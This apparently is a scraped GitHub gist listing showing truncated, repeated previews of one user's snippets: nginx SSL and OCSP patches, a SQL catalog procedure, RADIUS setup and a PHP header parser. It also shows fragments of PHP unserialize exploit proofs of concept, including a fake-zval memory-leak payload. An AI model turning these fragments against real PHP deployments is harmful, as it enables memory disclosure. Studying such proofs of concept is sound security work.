bizonix

## kotoblog_parse-http-accept-language-header.php
<?php
$prefLocales = array_reduce(
  explode(',', $_SERVER['HTTP_ACCEPT_LANGUAGE']),
  function ($res, $el) {
    list($l, $q) = array_merge(explode(';q=', $el), [1]);
    $res[$l] = (float) $q;
    return $res;
  }, []);
arsort($prefLocales);

## post-ocsp-nginx.patch
Allow force POST OCSP Request

diff -r 16a73c3a8fcd -r d66ba95eb8a9 src/event/ngx_event_openssl.h
--- a/src/event/ngx_event_openssl.h	Fri Mar 27 23:34:51 2015 +0200
+++ b/src/event/ngx_event_openssl.h	Fri Mar 27 23:35:54 2015 +0200
@@ -119,7 +119,7 @@
     ngx_str_t *cert, ngx_int_t depth);
 ngx_int_t ngx_ssl_crl(ngx_conf_t *cf, ngx_ssl_t *ssl, ngx_str_t *crl);
 ngx_int_t ngx_ssl_stapling(ngx_conf_t *cf, ngx_ssl_t *ssl,
-    ngx_str_t *file, ngx_str_t *responder, ngx_uint_t verify);

## StefanEsser_Original_LocalMemLeak.php
<?php
$data ='O:8:"stdClass":3:{s:3:"aaa";a:5:{i:0;i:1;i:1;i:2;i:2;s:39:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";i:3;i:4;i:4;i:5;}s:3:"aaa";i:1;s:3:"ccc";R:5;}';
$x = unserialize($data);
var_dump($x);
?>

## PHPLeak
<?php

$fakezval = pack(
    'IIII',     //unsigned int
    0x08048000, //address to leak
    0x0000000f, //length of string
    0x00000000, //refcount
    0x00000006  //data type NULL=0,LONG=1,DOUBLE=2,BOOL=3,ARR=4,OBJ=5,STR=6,RES=7
);
//obj from original POC by @ion1c

## StefanEsser_Original_POC
<?php
for ($i=4; $i<100; $i++) {
  var_dump($i);

  $m = new StdClass();
  $u = array(1);
  $m->aaa = array(1,2,&$u,4,5);

  $m->bbb = 1;
  $m->ccc = &$u;

## Github_terminal.md

      
              2 files
            
          
              6 forks
            
          
              9 comments
            
          
              7 stars
            
          
                carmat
                / Github_terminal.md
            
            
              Last active
              July 14, 2018 00:14
            
          
    This is an adaptation of https://twitter.com/jasonneylon script.
In the terminal window, you can open your current repo (at the current branch) in your default browser.
My adaptation was adding options to view the commits, branches, pull requests or issues for the repo using one of the additional options (added support for wiki, settings, pulse, graphs, network):
[h]               => View help
[c]               => View commits
[c {SHA}]         => View specific commit from commit SHA

[b] => View branches

  
## nginx.conf
# to generate your dhparam.pem file, run in the terminal
openssl dhparam -out /etc/nginx/ssl/dhparam.pem 2048

## ssl.rules
# Basically the nginx configuration I use at konklone.com.
# I check it using https://www.ssllabs.com/ssltest/analyze.html?d=konklone.com
#
# To provide feedback, please tweet at @konklone or email eric@konklone.com.
# Comments on gists don't notify the author.
#
# Thanks to WubTheCaptain (https://wubthecaptain.eu) for his help and ciphersuites.
# Thanks to Ilya Grigorik (https://www.igvita.com) for constant inspiration.

server {

## gist:6290973
delimiter ;;
    drop procedure if exists build_catalog;;
    create procedure build_catalog(IN categories INT, IN products INT)
    begin
        SET @category_count = 1;
        SET @CATNAMEPREFIX = "Category ";
        SET @CATURLKEYPREFIX = "cat-";
        SET @CATURLPATHPREFIX = "catpath-";
        SET @ROOTCATEGORY = 2;
        SET @INCLUDEINMENU = 1;

## gist:4103604
# Configuring basic RADIUS on OS X 10.8 Server
# Jedda Wignall
# http://jedda.me

# Full writeup at: http://jedda.me/2012/11/configuring-basic-radius-os-108-server/

# create the SACL for access to RADIUS
dseditgroup -q -o create -u <admin user> -n . com.apple.access_radius

# configure radiusd to log both successful and failed authentications
	Allow force POST OCSP Request

	diff -r 16a73c3a8fcd -r d66ba95eb8a9 src/event/ngx_event_openssl.h
	--- a/src/event/ngx_event_openssl.h Fri Mar 27 23:34:51 2015 +0200
	+++ b/src/event/ngx_event_openssl.h Fri Mar 27 23:35:54 2015 +0200
	@@ -119,7 +119,7 @@
	ngx_str_t *cert, ngx_int_t depth);
	ngx_int_t ngx_ssl_crl(ngx_conf_t cf, ngx_ssl_t ssl, ngx_str_t *crl);
	ngx_int_t ngx_ssl_stapling(ngx_conf_t cf, ngx_ssl_t ssl,
	- ngx_str_t file, ngx_str_t responder, ngx_uint_t verify);
	<?php
	$data ='O:8:"stdClass":3:{s:3:"aaa";a:5:{i:0;i:1;i:1;i:2;i:2;s:39:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";i:3;i:4;i:4;i:5;}s:3:"aaa";i:1;s:3:"ccc";R:5;}';
	$x = unserialize($data);
	var_dump($x);
	?>
	<?php

	$fakezval = pack(
	'IIII', //unsigned int
	0x08048000, //address to leak
	0x0000000f, //length of string
	0x00000000, //refcount
	0x00000006 //data type NULL=0,LONG=1,DOUBLE=2,BOOL=3,ARR=4,OBJ=5,STR=6,RES=7
	);
	//obj from original POC by @ion1c
	<?php
	for ($i=4; $i<100; $i++) {
	var_dump($i);

	$m = new StdClass();
	$u = array(1);
	$m->aaa = array(1,2,&$u,4,5);

	$m->bbb = 1;
	$m->ccc = &$u;
	# to generate your dhparam.pem file, run in the terminal
	openssl dhparam -out /etc/nginx/ssl/dhparam.pem 2048
	# Basically the nginx configuration I use at konklone.com.
	# I check it using https://www.ssllabs.com/ssltest/analyze.html?d=konklone.com
	#
	# To provide feedback, please tweet at @konklone or email eric@konklone.com.
	# Comments on gists don't notify the author.
	#
	# Thanks to WubTheCaptain (https://wubthecaptain.eu) for his help and ciphersuites.
	# Thanks to Ilya Grigorik (https://www.igvita.com) for constant inspiration.

	server {
	delimiter ;;
	drop procedure if exists build_catalog;;
	create procedure build_catalog(IN categories INT, IN products INT)
	begin
	SET @category_count = 1;
	SET @CATNAMEPREFIX = "Category ";
	SET @CATURLKEYPREFIX = "cat-";
	SET @CATURLPATHPREFIX = "catpath-";
	SET @ROOTCATEGORY = 2;
	SET @INCLUDEINMENU = 1;
	# Configuring basic RADIUS on OS X 10.8 Server
	# Jedda Wignall
	# http://jedda.me

	# Full writeup at: http://jedda.me/2012/11/configuring-basic-radius-os-108-server/

	# create the SACL for access to RADIUS
	dseditgroup -q -o create -u <admin user> -n . com.apple.access_radius

	# configure radiusd to log both successful and failed authentications